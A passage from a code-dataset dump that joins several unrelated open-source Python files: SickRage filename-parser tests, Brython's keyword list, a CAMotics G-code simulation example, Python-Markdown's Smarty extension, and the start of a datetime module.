'show.name.2010.222.123.source.quality.etc-group': parser.ParseResult(None, 'show name 2010.222', 1, [23], 'source.quality.etc', 'group'),
'Show.Name.102': parser.ParseResult(None, 'Show Name', 1, [2]),
'the.event.401.hdtv-group': parser.ParseResult(None, 'the event', 4, [1], 'hdtv', 'group'),
'show.name.2010.special.hdtv-blah': None,
'show.ex-name.102.hdtv-group': parser.ParseResult(None, 'show ex-name', 1, [2], 'hdtv', 'group'),
},
'stupid': {
'tpz-abc102': parser.ParseResult(None, None, 1, [2], None, 'tpz'),
'tpz-abc.102': parser.ParseResult(None, None, 1, [2], None, 'tpz')
},
'no_season': {
'Show Name - 01 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name'),
'01 - Ep Name': parser.ParseResult(None, None, None, [1], 'Ep Name'),
'Show Name - 01 - Ep Name - WEB-DL': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name - WEB-DL')
},
'no_season_general': {
'Show.Name.E23.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [23], 'Source.Quality.Etc', 'Group'),
'Show Name - Episode 01 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1], 'Ep Name'),
'Show.Name.Part.3.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [3], 'Source.Quality.Etc', 'Group'),
'Show.Name.Part.1.and.Part.2.Blah-Group': parser.ParseResult(None, 'Show Name', None, [1, 2], 'Blah', 'Group'),
'Show.Name.Part.IV.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [4], 'Source.Quality.Etc', 'Group'),
'Deconstructed.E07.1080i.HDTV.DD5.1.MPEG2-TrollHD': parser.ParseResult(None, 'Deconstructed', None, [7], '1080i.HDTV.DD5.1.MPEG2', 'TrollHD'),
'Show.Name.E23.WEB-DL': parser.ParseResult(None, 'Show Name', None, [23], 'WEB-DL'),
},
'no_season_multi_ep': {
'Show.Name.E23-24.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [23, 24], 'Source.Quality.Etc', 'Group'),
'Show Name - Episode 01-02 - Ep Name': parser.ParseResult(None, 'Show Name', None, [1, 2], 'Ep Name'),
'Show.Name.E23-24.WEB-DL': parser.ParseResult(None, 'Show Name', None, [23, 24], 'WEB-DL')
},
'season_only': {
'Show.Name.S02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 2, [], 'Source.Quality.Etc', 'Group'),
'Show Name Season 2': parser.ParseResult(None, 'Show Name', 2),
'Season 02': parser.ParseResult(None, None, 2)
},
'scene_date_format': {
'Show.Name.2010.11.23.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [], 'Source.Quality.Etc', 'Group', datetime.date(2010, 11, 23)),
'Show Name - 2010.11.23': parser.ParseResult(None, 'Show Name', air_date=datetime.date(2010, 11, 23)),
'Show.Name.2010.23.11.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', None, [], 'Source.Quality.Etc', 'Group', datetime.date(2010, 11, 23)),
'Show Name - 2010-11-23 - Ep Name': parser.ParseResult(None, 'Show Name', extra_info='Ep Name', air_date=datetime.date(2010, 11, 23)),
'2010-11-23 - Ep Name': parser.ParseResult(None, extra_info='Ep Name', air_date=datetime.date(2010, 11, 23)),
'Show.Name.2010.11.23.WEB-DL': parser.ParseResult(None, 'Show Name', None, [], 'WEB-DL', None, datetime.date(2010, 11, 23))
},
}
combination_test_cases = [
('/test/path/to/Season 02/03 - Ep Name.avi',
parser.ParseResult(None, None, 2, [3], 'Ep Name'),
['no_season', 'season_only']),
('Show.Name.S02.Source.Quality.Etc-Group/tpz-sn203.avi',
parser.ParseResult(None, 'Show Name', 2, [3], 'Source.Quality.Etc', 'Group'),
['stupid', 'season_only']),
('MythBusters.S08E16.720p.HDTV.x264-aAF/aaf-mb.s08e16.720p.mkv',
parser.ParseResult(None, 'MythBusters', 8, [16], '720p.HDTV.x264', 'aAF'),
['standard']),
('/home/drop/storage/TV/Terminator The Sarah Connor Chronicles/Season 2/S02E06 The Tower is Tall, But the Fall is Short.mkv',
parser.ParseResult(None, None, 2, [6], 'The Tower is Tall, But the Fall is Short'),
['standard']),
(r'/Test/TV/Jimmy Fallon/Season 2/Jimmy Fallon - 2010-12-15 - blah.avi',
parser.ParseResult(None, 'Jimmy Fallon', extra_info='blah', air_date=datetime.date(2010, 12, 15)),
['scene_date_format']),
(r'/X/30 Rock/Season 4/30 Rock - 4x22 -.avi',
parser.ParseResult(None, '30 Rock', 4, [22]),
['fov']),
('Season 2\\Show Name - 03-04 - Ep Name.ext',
parser.ParseResult(None, 'Show Name', 2, [3, 4], extra_info='Ep Name'),
['no_season', 'season_only']),
('Season 02\\03-04-05 - Ep Name.ext',
parser.ParseResult(None, None, 2, [3, 4, 5], extra_info='Ep Name'),
['no_season', 'season_only']),
]
unicode_test_cases = [
(u'The.Big.Bang.Theory.2x07.The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3-SHELDON.mkv',
parser.ParseResult(None, 'The.Big.Bang.Theory', 2, [7], u'The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3', 'SHELDON')),
('The.Big.Bang.Theory.2x07.The.Panty.Pi\xc3\xb1ata.Polarization.720p.HDTV.x264.AC3-SHELDON.mkv',
parser.ParseResult(None, 'The.Big.Bang.Theory', 2, [7], u'The.Panty.Pi\xf1ata.Polarization.720p.HDTV.x264.AC3', 'SHELDON'))
]
failure_cases = ['7sins-jfcs01e09-720p-bluray-x264']
class UnicodeTests(test.SiCKRAGETestDBCase):
def __init__(self, something):
super(UnicodeTests, self).__init__(something)
super(UnicodeTests, self).setUp()
self.show = tv.TVShow(1, 1, 'en')
self.show.name = "The Big Bang Theory"
def _test_unicode(self, name, result):
np = parser.NameParser(True, showObj=self.show)
parse_result = np.parse(name)
# this shouldn't raise an exception
repr(str(parse_result))
self.assertEqual(parse_result.extra_info, result.extra_info)
def test_unicode(self):
for (name, result) in unicode_test_cases:
self._test_unicode(name, result)
class FailureCaseTests(test.SiCKRAGETestDBCase):
@staticmethod
def _test_name(name):
np = parser.NameParser(True)
try:
parse_result = np.parse(name)
except (parser.InvalidNameException, parser.InvalidShowException):
return True
if VERBOSE:
print 'Actual: ', parse_result.which_regex, parse_result
return False
def test_failures(self):
for name in failure_cases:
self.assertTrue(self._test_name(name))
class ComboTests(test.SiCKRAGETestDBCase):
def _test_combo(self, name, result, which_regexes):
if VERBOSE:
print
print 'Testing', name
np = parser.NameParser(True)
try:
test_result = np.parse(name)
except parser.InvalidShowException:
return False
if DEBUG:
print test_result, test_result.which_regex
print result, which_regexes
self.assertEqual(test_result, result)
for cur_regex in which_regexes:
self.assertTrue(cur_regex in test_result.which_regex)
self.assertEqual(len(which_regexes), len(test_result.which_regex))
def test_combos(self):
for (name, result, which_regexes) in combination_test_cases:
# Normalise the paths. Converts UNIX-style paths into Windows-style
# paths when test is run on Windows.
self._test_combo(ek(os.path.normpath, name), result, which_regexes)
class BasicTests(test.SiCKRAGETestDBCase):
def __init__(self, something):
super(BasicTests, self).__init__(something)
super(BasicTests, self).setUp()
self.show = tv.TVShow(1, 1, 'en')
def _test_names(self, np, section, transform=None, verbose=False):
if VERBOSE or verbose:
print
print 'Running', section, 'tests'
for cur_test_base in simple_test_cases[section]:
if transform:
cur_test = transform(cur_test_base)
np.file_name = cur_test
else:
cur_test = cur_test_base
if VERBOSE or verbose:
print 'Testing', cur_test
result = simple_test_cases[section][cur_test_base]
self.show.name = result.series_name if result else None
np.showObj = self.show
if not result:
self.assertRaises(parser.InvalidNameException, np.parse, cur_test)
return
else:
result.which_regex = [section]
test_result = np.parse(cur_test)
if DEBUG or verbose:
print 'air_by_date:', test_result.is_air_by_date, 'air_date:', test_result.air_date
print 'anime:', test_result.is_anime, 'ab_episode_numbers:', test_result.ab_episode_numbers
print test_result
print result
self.assertEqual(test_result.which_regex, [section])
self.assertEqual(str(test_result), str(result))
def test_standard_names(self):
np = parser.NameParser(True)
self._test_names(np, 'standard')
def test_standard_repeat_names(self):
np = parser.NameParser(False)
self._test_names(np, 'standard_repeat')
def test_fov_names(self):
np = parser.NameParser(False)
self._test_names(np, 'fov')
def test_fov_repeat_names(self):
np = parser.NameParser(False)
self._test_names(np, 'fov_repeat')
#def test_bare_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'bare')
def test_stupid_names(self):
np = parser.NameParser(False)
self._test_names(np, 'stupid')
#def test_no_season_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'no_season')
def test_no_season_general_names(self):
np = parser.NameParser(False)
self._test_names(np, 'no_season_general')
def test_no_season_multi_ep_names(self):
np = parser.NameParser(False)
self._test_names(np, 'no_season_multi_ep')
def test_season_only_names(self):
np = parser.NameParser(False)
self._test_names(np, 'season_only')
#def test_scene_date_format_names(self):
# np = parser.NameParser(False)
# self._test_names(np, 'scene_date_format')
def test_standard_file_names(self):
np = parser.NameParser()
self._test_names(np, 'standard', lambda x: x + '.avi')
def test_standard_repeat_file_names(self):
np = parser.NameParser()
self._test_names(np, 'standard_repeat', lambda x: x + '.avi')
def test_fov_file_names(self):
np = parser.NameParser()
self._test_names(np, 'fov', lambda x: x + '.avi')
def test_fov_repeat_file_names(self):
np = parser.NameParser()
self._test_names(np, 'fov_repeat', lambda x: x + '.avi')
#def test_bare_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'bare', lambda x: x + '.avi')
def test_stupid_file_names(self):
np = parser.NameParser()
self._test_names(np, 'stupid', lambda x: x + '.avi')
#def test_no_season_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'no_season', lambda x: x + '.avi')
def test_no_season_general_file_names(self):
np = parser.NameParser()
self._test_names(np, 'no_season_general', lambda x: x + '.avi')
def test_no_season_multi_ep_file_names(self):
np = parser.NameParser()
self._test_names(np, 'no_season_multi_ep', lambda x: x + '.avi')
def test_season_only_file_names(self):
np = parser.NameParser()
self._test_names(np, 'season_only', lambda x: x + '.avi')
#def test_scene_date_format_file_names(self):
# np = parser.NameParser()
# self._test_names(np, 'scene_date_format', lambda x: x + '.avi')
def test_combination_names(self):
pass
if __name__ == '__main__':
print "=================="
print "STARTING - NAME PARSER TESTS"
print "=================="
print "######################################################################"
if len(sys.argv) > 1:
suite = unittest.TestLoader().loadTestsFromName('name_parser_tests.BasicTests.test_'+sys.argv[1])
unittest.TextTestRunner(verbosity=2).run(suite)
else:
suite = unittest.TestLoader().loadTestsFromTestCase(BasicTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(ComboTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(UnicodeTests)
unittest.TextTestRunner(verbosity=2).run(suite)
print "######################################################################"
suite = unittest.TestLoader().loadTestsFromTestCase(FailureCaseTests)
unittest.TextTestRunner(verbosity=2).run(suite)
| gpl-3.0 |
2014c2g3/0623exam | static/Brython3.1.1-20150328-091302/Lib/keyword_1.py | 761 | 2049 | #! /usr/bin/env python3
"""Keywords (from "graminit.c")
This file is automatically generated; please don't muck it up!
To update the symbols in this file, 'cd' to the top directory of
the python source tree after building the interpreter and run:
./python Lib/keyword.py
"""
__all__ = ["iskeyword", "kwlist"]
kwlist = [
#--start keywords--
'False',
'None',
'True',
'and',
'as',
'assert',
'break',
'class',
'continue',
'def',
'del',
'elif',
'else',
'except',
'finally',
'for',
'from',
'global',
'if',
'import',
'in',
'is',
'lambda',
'nonlocal',
'not',
'or',
'pass',
'raise',
'return',
'try',
'while',
'with',
'yield',
#--end keywords--
]
iskeyword = frozenset(kwlist).__contains__
def main():
import sys, re
args = sys.argv[1:]
iptfile = args and args[0] or "Python/graminit.c"
if len(args) > 1: optfile = args[1]
else: optfile = "Lib/keyword.py"
# scan the source file for keywords
with open(iptfile) as fp:
strprog = re.compile('"([^"]+)"')
lines = []
for line in fp:
if '{1, "' in line:
match = strprog.search(line)
if match:
lines.append(" '" + match.group(1) + "',\n")
lines.sort()
# load the output skeleton from the target
with open(optfile) as fp:
format = fp.readlines()
# insert the lines of keywords
try:
start = format.index("#--start keywords--\n") + 1
end = format.index("#--end keywords--\n")
format[start:end] = lines
except ValueError:
sys.stderr.write("target does not contain format markers\n")
sys.exit(1)
# write the output file
fp = open(optfile, 'w')
fp.write(''.join(format))
fp.close()
if __name__ == "__main__":
main()
| gpl-3.0 |
CauldronDevelopmentLLC/OpenSCAM | examples/python/camotics_python_example.py | 1 | 7363 | #!/usr/bin/env python3
#
# CAMotics is an Open-Source simulation and CAM software.
# Copyright (C) 2011-2021 Joseph Coffland <joseph@cauldrondevelopment.com>
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file is an example showing how to run a CAMotics simulation from Python
import camotics
import time
import signal
import sys
# Example GCode which cuts out a scorpion
gcode = '''
G21
T1M6
G0Z10.000
G0X0.000Y0.000S10000M3
G0X40.094Y235.389Z5.000
G1Z-3.000F600.0
G1X39.594Y234.826F1800.0
X33.059Y225.446
X29.088Y209.687
X29.338Y187.488
X32.027Y174.419
X36.905Y168.040
X38.969Y159.598
X46.473Y148.999
X55.665Y143.089
X61.856Y141.870
X68.047Y138.962
X78.027Y141.964
X88.870Y151.907
X91.496Y155.096
X100.877Y152.845
X97.312Y145.903
X90.934Y143.277
X83.993Y136.523
X68.047Y135.023
X63.544Y134.710
X56.884Y136.617
X47.223Y137.461
X40.845Y139.150
X35.404Y139.400
X32.965Y139.712
X32.965Y136.242
X46.848Y134.835
X62.606Y131.458
X74.881Y129.957
X82.679Y131.833
X91.497Y135.023
X97.312Y140.275
X99.563Y141.588
X101.252Y138.587
X100.501Y134.835
X95.624Y134.272
X91.403Y129.957
X76.864Y121.984
X62.231Y120.859
X47.926Y121.328
X43.283Y122.547
X33.528Y127.331
X31.277Y128.644
X29.401Y123.016
X28.557Y121.140
X39.344Y119.639
X55.477Y116.450
X73.675Y116.075
X89.433Y121.328
X96.499Y126.768
X100.501Y127.894
X99.845Y123.298
X92.435Y120.015
X88.589Y113.824
X79.115Y104.256
X75.926Y96.752
X58.979Y96.002
X53.977Y96.189
X44.221Y98.159
X33.716Y102.380
X26.212Y105.569
X24.336Y100.504
X33.153Y99.941
X39.907Y96.940
X50.225Y92.437
X58.104Y92.062
X65.561Y91.030
X75.644Y92.906
X83.430Y95.251
X89.433Y102.755
X92.059Y110.447
X97.875Y114.574
X96.562Y105.382
X93.842Y105.007
X92.622Y104.631
X89.621Y97.221
X88.964Y89.248
X83.805Y78.930
X81.929Y73.865
X75.082Y68.190
X67.296Y58.857
X58.760Y63.172
X49.287Y67.862
X40.845Y71.332
X36.155Y71.239
X34.279Y68.049
X44.409Y67.862
X53.977Y62.609
X58.667Y58.669
X63.169Y54.917
X70.298Y52.479
X85.118Y66.361
X86.807Y71.801
X91.497Y82.119
X92.059Y92.062
X93.185Y93.188
Y79.743
X97.312Y66.173
X101.252Y58.763
X104.159Y51.165
X111.070Y41.285
X121.513Y30.154
X132.206Y19.273
X146.088Y11.957
X160.909Y7.924
X173.478Y7.079
X183.045Y9.143
X193.739Y15.146
X197.960Y21.525
X196.928Y30.529
X187.226Y42.589
X180.419Y52.854
X178.355Y61.296
X174.979Y54.355
X176.479Y36.533
X183.608Y20.211
X182.389Y17.397
X169.726Y18.898
X162.972Y16.741
X156.312Y22.181
X144.775Y23.776
X138.584Y31.749
X132.018Y34.281
X128.266Y39.440
X123.326Y42.223
X121.325Y50.040
X129.767Y67.862
X134.457Y84.183
Y90.937
X138.115Y86.997
X140.835Y73.677
X153.029Y60.358
X157.907Y59.232
X165.786Y64.110
X173.290Y72.427
X182.670Y76.491
X190.268Y76.116
X191.487Y79.493
X176.542Y77.680
X166.255Y70.394
X160.533Y64.297
X153.092Y67.987
X147.214Y73.302
X144.400Y83.620
X141.586Y89.623
X140.460Y95.627
X136.521Y99.379
X134.082Y100.598
X133.144Y110.259
X133.707Y111.385
X138.959Y105.194
X143.274Y100.879
X147.120Y98.816
X151.341Y96.752
X162.785Y94.970
X171.508Y92.719
X178.824Y94.782
X190.174Y95.251
X198.241Y90.374
X199.929Y95.064
X185.484Y97.878
X176.198Y97.315
X164.379Y97.409
X153.874Y102.286
X148.339Y102.568
X141.211Y111.385
X137.771Y115.012
X133.144Y118.326
X130.893Y121.140
X130.330Y124.329
X134.832Y121.515
X139.428Y119.827
X149.840Y113.261
X155.281Y111.885
X161.873Y110.447
X172.602Y111.823
X179.997Y111.338
X184.921Y112.323
X193.739Y112.573
X201.055Y110.447
X201.430Y115.325
X191.112Y114.387
X180.794Y115.512
X172.399Y115.887
X159.327Y117.763
X154.718
X147.589Y123.673
X140.554Y126.768
X135.020Y132.209
X130.142Y133.522
X129.017Y142.996
X134.082Y143.089
X138.021Y139.713
X146.839Y138.212
X155.281Y133.147
X161.284Y133.522
X168.975Y130.145
X174.228Y127.456
X180.794Y120.953
X183.608Y123.766
X174.979Y131.646
X164.098Y134.741
X157.719Y137.555
X150.122Y140.651
X139.710Y144.872
X134.269Y145.340
X130.142Y150.781
X137.021Y152.782
X142.149Y150.593
X149.277Y143.465
X162.972Y140.088
X171.039Y142.151
X180.044Y145.903
X191.300Y156.597
X193.832Y165.226
X201.055Y174.981
X206.120Y189.802
X205.772Y207.597
X200.867Y223.945
X195.427Y232.762
X194.489Y216.253
X191.300Y200.120
X192.050Y229.010
X188.157Y202.652
X187.735Y192.991
X182.952Y186.144
X183.233Y177.795
X189.987Y168.228
X186.891Y164.570
X175.729Y160.349
X170.851Y155.283
X170.101Y149.468
X165.724Y150.030
X155.281Y157.159
X142.524Y158.379
X137.083Y162.037
X136.333Y164.007
X126.203Y156.221
X123.107Y155.846
X122.638Y155.096
X120.293Y160.818
X117.761Y161.943
X117.010Y155.096
X113.258Y156.034
X114.196Y161.287
X111.945
X107.818Y153.970
X102.040Y159.973
X93.935Y165.320
X92.247Y165.414
X91.403Y161.849
X86.181Y159.223
X68.234Y154.158
X59.980Y150.687
X57.541Y153.220
X54.633Y159.786
X44.484Y166.127
X40.469Y172.355
X48.818Y182.861
X51.350Y191.115
X44.972Y203.872
X40.845Y231.637
X40.657Y213.439
X39.391Y224.695
X40.094Y235.389
G0Z5.000
G0X0.000Y0.000Z10.000
G0Z10.000
G0X0Y0
M30
'''
def signal_handler(sig, frame):
print('interrupted')
s.interrupt()
s.wait()
old_handler(sig, frame)
def callback(status, progress):
print('%s %0.1f%%' % (status, progress * 100))
# Replace the CTRL-C interrupt handler so we can shutdown the background
# thread gracefully.
old_handler = signal.signal(signal.SIGINT, signal_handler)
print('CAMotics version %d.%d.%d' % camotics.VERSION)
# Create the simulation
s = camotics.Simulation()
s.set_metric()
s.set_workpiece(min = (0, 0, -3), max = (216, 248, 0))
s.set_tool(1, metric = True, shape = 'cylindrical', length = 12.7, diameter = 1)
s.set_resolution('high')
# Alternatively you can open a CAMotics simulation file
# s.open('examples/camotics/camotics.camotics')
# Compute the tool path from the GCode and wait for it to finish
s.compute_path(gcode)
s.wait() # Must be called to clean up the background thread
# The tool path can be accessed
path = s.get_path()
total = sum([step['time'] for step in s.get_path()])
print('Total time %0.2fs' % total)
# Alternatively, you can set the tool path with s.set_path(path) using
# the same path format that get_path() returns.
# Start the simulation, passing a progress callback function
s.start(callback, done = lambda x: print('success=%s' % x))
while s.is_running():
# Do other stuff here
time.sleep(0.25)
# Wait for the simulation to complete
s.wait() # Must be called to clean up the background thread
# Get the computed surface in STL ASCII format
# The surface can be accessed in STL 'ascii', STL 'binary' or 'python' format.
print('Writing surface STL')
surface = s.get_surface('ascii')
with open('test.stl', 'wb') as f:
f.write(surface)
# Alternatively, write the STL directly to a file with s.write_surface(). This
# will be much faster as it avoid converting the data.
# Print some information about the simulation we just ran.
print(s.is_metric())
print(s.get_tools())
print(s.get_resolution())
print(s.get_workpiece())
| gpl-2.0 |
steventimberman/masterDebater | venv/lib/python2.7/site-packages/markdown/extensions/smarty.py | 62 | 10360 | # -*- coding: utf-8 -*-
'''
Smarty extension for Python-Markdown
====================================
Adds conversion of ASCII dashes, quotes and ellipses to their HTML
entity equivalents.
See <https://pythonhosted.org/Markdown/extensions/smarty.html>
for documentation.
Author: 2013, Dmitry Shachnev <mitya57@gmail.com>
All changes Copyright 2013-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
SmartyPants license:
Copyright (c) 2003 John Gruber <http://daringfireball.net/>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license:
smartypants.py is a derivative work of SmartyPants.
Copyright (c) 2004, 2007 Chad Miller <http://web.chad.org/>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
'''
from __future__ import unicode_literals
from . import Extension
from ..inlinepatterns import HtmlPattern, HTML_RE
from ..odict import OrderedDict
from ..treeprocessors import InlineProcessor
# Constants for quote education.
punctClass = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
endOfWordClass = r"[\s.,;:!?)]"
closeClass = "[^\ \t\r\n\[\{\(\-\u0002\u0003]"
openingQuotesBase = (
'(\s' # a whitespace char
'| ' # or a non-breaking space entity
'|--' # or dashes
'|–|—' # or unicode
'|&[mn]dash;' # or named dash entities
'|–|—' # or decimal entities
')'
)
substitutions = {
'mdash': '—',
'ndash': '–',
'ellipsis': '…',
'left-angle-quote': '«',
'right-angle-quote': '»',
'left-single-quote': '‘',
'right-single-quote': '’',
'left-double-quote': '“',
'right-double-quote': '”',
}
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
singleQuoteStartRe = r"^'(?=%s\B)" % punctClass
doubleQuoteStartRe = r'^"(?=%s\B)' % punctClass
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
doubleQuoteSetsRe = r""""'(?=\w)"""
singleQuoteSetsRe = r"""'"(?=\w)"""
# Special case for decade abbreviations (the '80s):
decadeAbbrRe = r"(?<!\w)'(?=\d{2}s)"
# Get most opening double quotes:
openingDoubleQuotesRegex = r'%s"(?=\w)' % openingQuotesBase
# Double closing quotes:
closingDoubleQuotesRegex = r'"(?=\s)'
closingDoubleQuotesRegex2 = '(?<=%s)"' % closeClass
# Get most opening single quotes:
openingSingleQuotesRegex = r"%s'(?=\w)" % openingQuotesBase
# Single closing quotes:
closingSingleQuotesRegex = r"(?<=%s)'(?!\s|s\b|\d)" % closeClass
closingSingleQuotesRegex2 = r"(?<=%s)'(\s|s\b)" % closeClass
# All remaining quotes should be opening ones
remainingSingleQuotesRegex = "'"
remainingDoubleQuotesRegex = '"'
HTML_STRICT_RE = HTML_RE + r'(?!\>)'
class SubstituteTextPattern(HtmlPattern):
def __init__(self, pattern, replace, markdown_instance):
""" Replaces matches with some text. """
HtmlPattern.__init__(self, pattern)
self.replace = replace
self.markdown = markdown_instance
def handleMatch(self, m):
result = ''
for part in self.replace:
if isinstance(part, int):
result += m.group(part)
else:
result += self.markdown.htmlStash.store(part, safe=True)
return result
class SmartyExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {
'smart_quotes': [True, 'Educate quotes'],
'smart_angled_quotes': [False, 'Educate angled quotes'],
'smart_dashes': [True, 'Educate dashes'],
'smart_ellipses': [True, 'Educate ellipses'],
'substitutions': [{}, 'Overwrite default substitutions'],
}
super(SmartyExtension, self).__init__(*args, **kwargs)
self.substitutions = dict(substitutions)
self.substitutions.update(self.getConfig('substitutions', default={}))
def _addPatterns(self, md, patterns, serie):
for ind, pattern in enumerate(patterns):
pattern += (md,)
pattern = SubstituteTextPattern(*pattern)
after = ('>smarty-%s-%d' % (serie, ind - 1) if ind else '_begin')
name = 'smarty-%s-%d' % (serie, ind)
self.inlinePatterns.add(name, pattern, after)
def educateDashes(self, md):
emDashesPattern = SubstituteTextPattern(
r'(?<!-)---(?!-)', (self.substitutions['mdash'],), md
)
enDashesPattern = SubstituteTextPattern(
r'(?<!-)--(?!-)', (self.substitutions['ndash'],), md
)
self.inlinePatterns.add('smarty-em-dashes', emDashesPattern, '_begin')
self.inlinePatterns.add(
'smarty-en-dashes', enDashesPattern, '>smarty-em-dashes'
)
def educateEllipses(self, md):
ellipsesPattern = SubstituteTextPattern(
r'(?<!\.)\.{3}(?!\.)', (self.substitutions['ellipsis'],), md
)
self.inlinePatterns.add('smarty-ellipses', ellipsesPattern, '_begin')
def educateAngledQuotes(self, md):
leftAngledQuotePattern = SubstituteTextPattern(
r'\<\<', (self.substitutions['left-angle-quote'],), md
)
rightAngledQuotePattern = SubstituteTextPattern(
r'\>\>', (self.substitutions['right-angle-quote'],), md
)
self.inlinePatterns.add(
'smarty-left-angle-quotes', leftAngledQuotePattern, '_begin'
)
self.inlinePatterns.add(
'smarty-right-angle-quotes',
rightAngledQuotePattern,
'>smarty-left-angle-quotes'
)
def educateQuotes(self, md):
lsquo = self.substitutions['left-single-quote']
rsquo = self.substitutions['right-single-quote']
ldquo = self.substitutions['left-double-quote']
rdquo = self.substitutions['right-double-quote']
patterns = (
(singleQuoteStartRe, (rsquo,)),
(doubleQuoteStartRe, (rdquo,)),
(doubleQuoteSetsRe, (ldquo + lsquo,)),
(singleQuoteSetsRe, (lsquo + ldquo,)),
(decadeAbbrRe, (rsquo,)),
(openingSingleQuotesRegex, (2, lsquo)),
(closingSingleQuotesRegex, (rsquo,)),
(closingSingleQuotesRegex2, (rsquo, 2)),
(remainingSingleQuotesRegex, (lsquo,)),
(openingDoubleQuotesRegex, (2, ldquo)),
(closingDoubleQuotesRegex, (rdquo,)),
(closingDoubleQuotesRegex2, (rdquo,)),
(remainingDoubleQuotesRegex, (ldquo,))
)
self._addPatterns(md, patterns, 'quotes')
def extendMarkdown(self, md, md_globals):
configs = self.getConfigs()
self.inlinePatterns = OrderedDict()
if configs['smart_ellipses']:
self.educateEllipses(md)
if configs['smart_quotes']:
self.educateQuotes(md)
if configs['smart_angled_quotes']:
self.educateAngledQuotes(md)
# Override HTML_RE from inlinepatterns.py so that it does not
# process tags with duplicate closing quotes.
md.inlinePatterns["html"] = HtmlPattern(HTML_STRICT_RE, md)
if configs['smart_dashes']:
self.educateDashes(md)
inlineProcessor = InlineProcessor(md)
inlineProcessor.inlinePatterns = self.inlinePatterns
md.treeprocessors.add('smarty', inlineProcessor, '_end')
md.ESCAPED_CHARS.extend(['"', "'"])
def makeExtension(*args, **kwargs):
return SmartyExtension(*args, **kwargs)
| mit |
4022321818/40223218w11 | static/Brython3.1.0-20150301-090019/Lib/datetime.py | 628 | 75044 | """Concrete date/time and related types.
See http://www.iana.org/time-zones/repository/tz-link.html for
time zone and DST data sources.
"""
import time as _time
import math as _math
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
MINYEAR = 1
MAXYEAR = 9999
_MAXORDINAL = 3652059 # date.max.toordinal()
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
_DAYS_IN_MONTH = [None, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [None]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
